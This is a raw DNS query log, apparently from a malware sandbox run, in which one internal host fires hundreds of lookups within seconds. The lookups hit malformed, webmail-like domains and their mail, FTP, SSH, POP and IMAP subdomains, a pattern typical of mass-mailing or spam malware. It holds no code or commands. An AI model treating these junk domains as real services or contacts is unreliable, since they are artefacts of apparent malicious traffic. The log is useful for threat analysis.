Nov 30, 2023 11:22:36.194890022 CET	192.168.2.4	1.1.1.1	0xb2dd	Standard query (0)	a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.194921017 CET	192.168.2.4	1.1.1.1	0x441a	Standard query (0)	ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.195059061 CET	192.168.2.4	1.1.1.1	0x5b3e	Standard query (0)	mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.195317030 CET	192.168.2.4	1.1.1.1	0xdf11	Standard query (0)	a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.195538044 CET	192.168.2.4	1.1.1.1	0x371b	Standard query (0)	bjail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.195683002 CET	192.168.2.4	1.1.1.1	0x6e5a	Standard query (0)	yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.195683002 CET	192.168.2.4	1.1.1.1	0xfeea	Standard query (0)	yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.195852995 CET	192.168.2.4	1.1.1.1	0x7ea6	Standard query (0)	oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.196065903 CET	192.168.2.4	1.1.1.1	0x3b77	Standard query (0)	gbya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.196065903 CET	192.168.2.4	1.1.1.1	0x7d6d	Standard query (0)	pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.196635008 CET	192.168.2.4	1.1.1.1	0x360a	Standard query (0)	h2.spainvil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.196871996 CET	192.168.2.4	1.1.1.1	0x6389	Standard query (0)	gcann.cr.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.197068930 CET	192.168.2.4	1.1.1.1	0xa428	Standard query (0)	m7l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.197196007 CET	192.168.2.4	1.1.1.1	0xe0bc	Standard query (0)	s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.197532892 CET	192.168.2.4	1.1.1.1	0x824	Standard query (0)	lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.197796106 CET	192.168.2.4	1.1.1.1	0x46c0	Standard query (0)	yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.198455095 CET	192.168.2.4	1.1.1.1	0x6041	Standard query (0)	yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.198455095 CET	192.168.2.4	1.1.1.1	0x57c2	Standard query (0)	horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.198964119 CET	192.168.2.4	1.1.1.1	0x1c5e	Standard query (0)	ct.ated.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.199306011 CET	192.168.2.4	1.1.1.1	0xa942	Standard query (0)	n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.199584007 CET	192.168.2.4	1.1.1.1	0xfcec	Standard query (0)	rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.200036049 CET	192.168.2.4	1.1.1.1	0x3e0f	Standard query (0)	gmo.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.200500965 CET	192.168.2.4	1.1.1.1	0x844a	Standard query (0)	apee.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.201585054 CET	192.168.2.4	1.1.1.1	0xff09	Standard query (0)	comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.202055931 CET	192.168.2.4	1.1.1.1	0xa305	Standard query (0)	smtp.secureserver.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.204037905 CET	192.168.2.4	1.1.1.1	0x1914	Standard query (0)	sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.204346895 CET	192.168.2.4	1.1.1.1	0x3f27	Standard query (0)	sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.205339909 CET	192.168.2.4	1.1.1.1	0xd0f6	Standard query (0)	gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.205537081 CET	192.168.2.4	1.1.1.1	0x2610	Standard query (0)	deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.205873966 CET	192.168.2.4	1.1.1.1	0xb561	Standard query (0)	fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.207619905 CET	192.168.2.4	1.1.1.1	0x7d01	Standard query (0)	as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.210087061 CET	192.168.2.4	1.1.1.1	0xc163	Standard query (0)	jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.210087061 CET	192.168.2.4	1.1.1.1	0xce2b	Standard query (0)	ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.210490942 CET	192.168.2.4	1.1.1.1	0x2e56	Standard query (0)	yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.211889982 CET	192.168.2.4	1.1.1.1	0xf543	Standard query (0)	6ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.212069035 CET	192.168.2.4	1.1.1.1	0xd2ea	Standard query (0)	7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.212090969 CET	192.168.2.4	1.1.1.1	0xe185	Standard query (0)	e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.212090969 CET	192.168.2.4	1.1.1.1	0x3207	Standard query (0)	gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.212502956 CET	192.168.2.4	1.1.1.1	0x6ad4	Standard query (0)	h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.212502956 CET	192.168.2.4	1.1.1.1	0x8ca6	Standard query (0)	hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.212902069 CET	192.168.2.4	1.1.1.1	0xef77	Standard query (0)	wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.213112116 CET	192.168.2.4	1.1.1.1	0xbac1	Standard query (0)	rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.213112116 CET	192.168.2.4	1.1.1.1	0x3475	Standard query (0)	ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.213747025 CET	192.168.2.4	1.1.1.1	0x1d19	Standard query (0)	yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.214054108 CET	192.168.2.4	1.1.1.1	0xdc6b	Standard query (0)	e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.214226961 CET	192.168.2.4	1.1.1.1	0x1cb7	Standard query (0)	il.cm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.214821100 CET	192.168.2.4	1.1.1.1	0xfc52	Standard query (0)	ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.215382099 CET	192.168.2.4	1.1.1.1	0xbbe1	Standard query (0)	f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.215382099 CET	192.168.2.4	1.1.1.1	0x4a5e	Standard query (0)	yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.215735912 CET	192.168.2.4	1.1.1.1	0x2dc3	Standard query (0)	he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.216016054 CET	192.168.2.4	1.1.1.1	0xa93a	Standard query (0)	h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.219496012 CET	192.168.2.4	1.1.1.1	0xba17	Standard query (0)	yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.220197916 CET	192.168.2.4	1.1.1.1	0x2f68	Standard query (0)	96l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.220199108 CET	192.168.2.4	1.1.1.1	0xb4f3	Standard query (0)	qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.225027084 CET	192.168.2.4	1.1.1.1	0x1454	Standard query (0)	onlist.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.245265961 CET	192.168.2.4	1.1.1.1	0xa2fb	Standard query (0)	il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.245604992 CET	192.168.2.4	1.1.1.1	0x62a1	Standard query (0)	klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.248217106 CET	192.168.2.4	1.1.1.1	0x812	Standard query (0)	z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.265094995 CET	192.168.2.4	1.1.1.1	0xb1c0	Standard query (0)	1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939250946 CET	192.168.2.4	1.1.1.1	0xdd43	Standard query (0)	il.om	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939330101 CET	192.168.2.4	1.1.1.1	0xca19	Standard query (0)	a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939347982 CET	192.168.2.4	1.1.1.1	0xfbc2	Standard query (0)	cm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939367056 CET	192.168.2.4	1.1.1.1	0x2bec	Standard query (0)	cm.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939404011 CET	192.168.2.4	1.1.1.1	0xbc91	Standard query (0)	gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939419031 CET	192.168.2.4	1.1.1.1	0xce90	Standard query (0)	m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939443111 CET	192.168.2.4	1.1.1.1	0x16e5	Standard query (0)	hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939462900 CET	192.168.2.4	1.1.1.1	0x3b77	Standard query (0)	gbya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939497948 CET	192.168.2.4	1.1.1.1	0x60f	Standard query (0)	san.ee	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939517975 CET	192.168.2.4	1.1.1.1	0xe163	Standard query (0)	slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939533949 CET	192.168.2.4	1.1.1.1	0xcb4a	Standard query (0)	ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939549923 CET	192.168.2.4	1.1.1.1	0x5b3e	Standard query (0)	mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939570904 CET	192.168.2.4	1.1.1.1	0x3c22	Standard query (0)	noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939683914 CET	192.168.2.4	1.1.1.1	0xca24	Standard query (0)	syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939712048 CET	192.168.2.4	1.1.1.1	0x3f27	Standard query (0)	sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939729929 CET	192.168.2.4	1.1.1.1	0x844a	Standard query (0)	apee.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939740896 CET	192.168.2.4	1.1.1.1	0x1cb7	Standard query (0)	il.cm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939829111 CET	192.168.2.4	1.1.1.1	0xb561	Standard query (0)	fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939852953 CET	192.168.2.4	1.1.1.1	0xe185	Standard query (0)	e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939862967 CET	192.168.2.4	1.1.1.1	0x6ad4	Standard query (0)	h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939907074 CET	192.168.2.4	1.1.1.1	0x812	Standard query (0)	z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.939928055 CET	192.168.2.4	1.1.1.1	0xb1c0	Standard query (0)	1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.972652912 CET	192.168.2.4	1.1.1.1	0xd028	Standard query (0)	mail.mailerhost.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.149502039 CET	192.168.2.4	1.1.1.1	0x5ebb	Standard query (0)	mail.nrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.180722952 CET	192.168.2.4	1.1.1.1	0xf20e	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.215698957 CET	192.168.2.4	1.1.1.1	0xf31f	Standard query (0)	mail.1.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.247582912 CET	192.168.2.4	1.1.1.1	0x37af	Standard query (0)	gmr-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.251250029 CET	192.168.2.4	1.1.1.1	0xf2a7	Standard query (0)	mx.hetemail.jp	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.267644882 CET	192.168.2.4	1.1.1.1	0xad35	Standard query (0)	ftp.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.359937906 CET	192.168.2.4	1.1.1.1	0xfbf9	Standard query (0)	imap.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.362093925 CET	192.168.2.4	1.1.1.1	0x16be	Standard query (0)	mailgate.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.364310980 CET	192.168.2.4	1.1.1.1	0xb28c	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.364841938 CET	192.168.2.4	1.1.1.1	0xb59f	Standard query (0)	mail.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.365259886 CET	192.168.2.4	1.1.1.1	0x2a23	Standard query (0)	ftp.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.370475054 CET	192.168.2.4	1.1.1.1	0x54c3	Standard query (0)		256	256	false
Nov 30, 2023 11:22:38.392704010 CET	192.168.2.4	1.1.1.1	0x4f59	Standard query (0)	ftp.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.392704010 CET	192.168.2.4	1.1.1.1	0x6707	Standard query (0)	mail.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.392704010 CET	192.168.2.4	1.1.1.1	0xdbe8	Standard query (0)	mail.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.571834087 CET	192.168.2.4	1.1.1.1	0xada1	Standard query (0)	mail.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.584266901 CET	192.168.2.4	1.1.1.1	0xf2a7	Standard query (0)	mx.hetemail.jp	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.591659069 CET	192.168.2.4	1.1.1.1	0xffaf	Standard query (0)	imap.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.593029976 CET	192.168.2.4	1.1.1.1	0xeb1a	Standard query (0)	mailgate.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.593987942 CET	192.168.2.4	1.1.1.1	0xe888	Standard query (0)	ftp.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.597389936 CET	192.168.2.4	1.1.1.1	0xee9b	Standard query (0)	mail.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.616060019 CET	192.168.2.4	1.1.1.1	0x811a	Standard query (0)	mail.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.616239071 CET	192.168.2.4	1.1.1.1	0x6508	Standard query (0)	ftp.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.617471933 CET	192.168.2.4	1.1.1.1	0x6c22	Standard query (0)	ssh.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.617640018 CET	192.168.2.4	1.1.1.1	0x6f04	Standard query (0)	ssh.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.617831945 CET	192.168.2.4	1.1.1.1	0x8bb8	Standard query (0)	ftp.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.623492956 CET	192.168.2.4	1.1.1.1	0x46c2	Standard query (0)	ssh.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.623790026 CET	192.168.2.4	1.1.1.1	0xef63	Standard query (0)	ftp.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.624196053 CET	192.168.2.4	1.1.1.1	0xc5e5	Standard query (0)	ftp.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.624430895 CET	192.168.2.4	1.1.1.1	0x234c	Standard query (0)	ssh.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.624597073 CET	192.168.2.4	1.1.1.1	0x57d4	Standard query (0)	ftp.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.624749899 CET	192.168.2.4	1.1.1.1	0xb2ae	Standard query (0)	mail.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.624949932 CET	192.168.2.4	1.1.1.1	0x618e	Standard query (0)	ssh.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.625330925 CET	192.168.2.4	1.1.1.1	0xacba	Standard query (0)	mail.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.625792027 CET	192.168.2.4	1.1.1.1	0x2c77	Standard query (0)	mail.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.626060009 CET	192.168.2.4	1.1.1.1	0x4a8d	Standard query (0)	pop.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.626648903 CET	192.168.2.4	1.1.1.1	0x9339	Standard query (0)	pop.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.627079010 CET	192.168.2.4	1.1.1.1	0xc9e4	Standard query (0)	pop3.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.627372980 CET	192.168.2.4	1.1.1.1	0x9631	Standard query (0)	mail.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.627604008 CET	192.168.2.4	1.1.1.1	0xc490	Standard query (0)	ftp.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.627928019 CET	192.168.2.4	1.1.1.1	0x567a	Standard query (0)	ftp.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.628604889 CET	192.168.2.4	1.1.1.1	0xe58b	Standard query (0)	ftp.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.628799915 CET	192.168.2.4	1.1.1.1	0xab80	Standard query (0)	ftp.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.630009890 CET	192.168.2.4	1.1.1.1	0x2cfa	Standard query (0)	mail.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.630793095 CET	192.168.2.4	1.1.1.1	0xbdec	Standard query (0)	ftp.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.631370068 CET	192.168.2.4	1.1.1.1	0xfd1f	Standard query (0)	ftp.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.631771088 CET	192.168.2.4	1.1.1.1	0x4e60	Standard query (0)	pop.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.632703066 CET	192.168.2.4	1.1.1.1	0x97eb	Standard query (0)	ftp.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.643086910 CET	192.168.2.4	1.1.1.1	0xf10b	Standard query (0)	ssh.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.646790981 CET	192.168.2.4	1.1.1.1	0x6535	Standard query (0)	mail.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.654364109 CET	192.168.2.4	1.1.1.1	0x2a94	Standard query (0)	ftp.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.654911995 CET	192.168.2.4	1.1.1.1	0xdbe8	Standard query (0)	mail.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.656049013 CET	192.168.2.4	1.1.1.1	0x2161	Standard query (0)	ftp.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.656522989 CET	192.168.2.4	1.1.1.1	0xf946	Standard query (0)	ftp.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.658004045 CET	192.168.2.4	1.1.1.1	0xba9d	Standard query (0)	ftp.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.659535885 CET	192.168.2.4	1.1.1.1	0x1f09	Standard query (0)	mail.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.660773993 CET	192.168.2.4	1.1.1.1	0x1745	Standard query (0)	ftp.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.661168098 CET	192.168.2.4	1.1.1.1	0x3520	Standard query (0)	ftp.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.661844015 CET	192.168.2.4	1.1.1.1	0xc61	Standard query (0)	mailgate.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.662647963 CET	192.168.2.4	1.1.1.1	0xf311	Standard query (0)	pop3.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.662842035 CET	192.168.2.4	1.1.1.1	0x6148	Standard query (0)	ssh.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.663029909 CET	192.168.2.4	1.1.1.1	0x23b9	Standard query (0)	mail.bjail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.663718939 CET	192.168.2.4	1.1.1.1	0xa228	Standard query (0)	mail.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.664532900 CET	192.168.2.4	1.1.1.1	0x8eb7	Standard query (0)	mail.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.666189909 CET	192.168.2.4	1.1.1.1	0xd1d5	Standard query (0)	mail.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.667095900 CET	192.168.2.4	1.1.1.1	0xfb4f	Standard query (0)	mail.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.671252012 CET	192.168.2.4	1.1.1.1	0x5e81	Standard query (0)	imap.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.672588110 CET	192.168.2.4	1.1.1.1	0x7a09	Standard query (0)	mail.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.675919056 CET	192.168.2.4	1.1.1.1	0x9bcf	Standard query (0)	ftp.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.676249981 CET	192.168.2.4	1.1.1.1	0x43ef	Standard query (0)	mailgate.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.676517963 CET	192.168.2.4	1.1.1.1	0x2f4a	Standard query (0)	mail.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.689481974 CET	192.168.2.4	1.1.1.1	0x676e	Standard query (0)	ssh.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.690066099 CET	192.168.2.4	1.1.1.1	0xbeeb	Standard query (0)	ssh.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.691468000 CET	192.168.2.4	1.1.1.1	0x4e3f	Standard query (0)	ftp.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.691950083 CET	192.168.2.4	1.1.1.1	0xa46e	Standard query (0)	ftp.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.822345972 CET	192.168.2.4	1.1.1.1	0xcc3d	Standard query (0)	mail.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.842817068 CET	192.168.2.4	1.1.1.1	0xeb1a	Standard query (0)	mailgate.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.846041918 CET	192.168.2.4	1.1.1.1	0x2b28	Standard query (0)	ssh.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.847001076 CET	192.168.2.4	1.1.1.1	0x57d9	Standard query (0)	mail.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.859055996 CET	192.168.2.4	1.1.1.1	0x6508	Standard query (0)	ftp.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.862989902 CET	192.168.2.4	1.1.1.1	0x435f	Standard query (0)	ssh.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.863732100 CET	192.168.2.4	1.1.1.1	0xce9e	Standard query (0)	ftp.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.868336916 CET	192.168.2.4	1.1.1.1	0x88e0	Standard query (0)	mail.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.870498896 CET	192.168.2.4	1.1.1.1	0xd65f	Standard query (0)	ssh.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.871970892 CET	192.168.2.4	1.1.1.1	0xe4cc	Standard query (0)	ftp.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.882121086 CET	192.168.2.4	1.1.1.1	0xab80	Standard query (0)	ftp.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.882169962 CET	192.168.2.4	1.1.1.1	0x2cfa	Standard query (0)	mail.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.891526937 CET	192.168.2.4	1.1.1.1	0x3edb	Standard query (0)	pop.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.901436090 CET	192.168.2.4	1.1.1.1	0xc369	Standard query (0)	imap.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.904642105 CET	192.168.2.4	1.1.1.1	0xf946	Standard query (0)	ftp.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.904671907 CET	192.168.2.4	1.1.1.1	0xd1d5	Standard query (0)	mail.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.906857967 CET	192.168.2.4	1.1.1.1	0x7adf	Standard query (0)	mail.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.907183886 CET	192.168.2.4	1.1.1.1	0xc77c	Standard query (0)	ftp.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.912309885 CET	192.168.2.4	1.1.1.1	0x671c	Standard query (0)	ftp.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.914203882 CET	192.168.2.4	1.1.1.1	0xa31e	Standard query (0)	mail.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.914696932 CET	192.168.2.4	1.1.1.1	0x6766	Standard query (0)	ssh.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.921462059 CET	192.168.2.4	1.1.1.1	0x43ef	Standard query (0)	mailgate.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.070593119 CET	192.168.2.4	1.1.1.1	0x921e	Standard query (0)	wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.095443010 CET	192.168.2.4	1.1.1.1	0x9383	Standard query (0)	tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.096172094 CET	192.168.2.4	1.1.1.1	0xcde4	Standard query (0)	qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.099639893 CET	192.168.2.4	1.1.1.1	0xd947	Standard query (0)	domo5ho.com	A (IP address)	IN (0x0001)	false
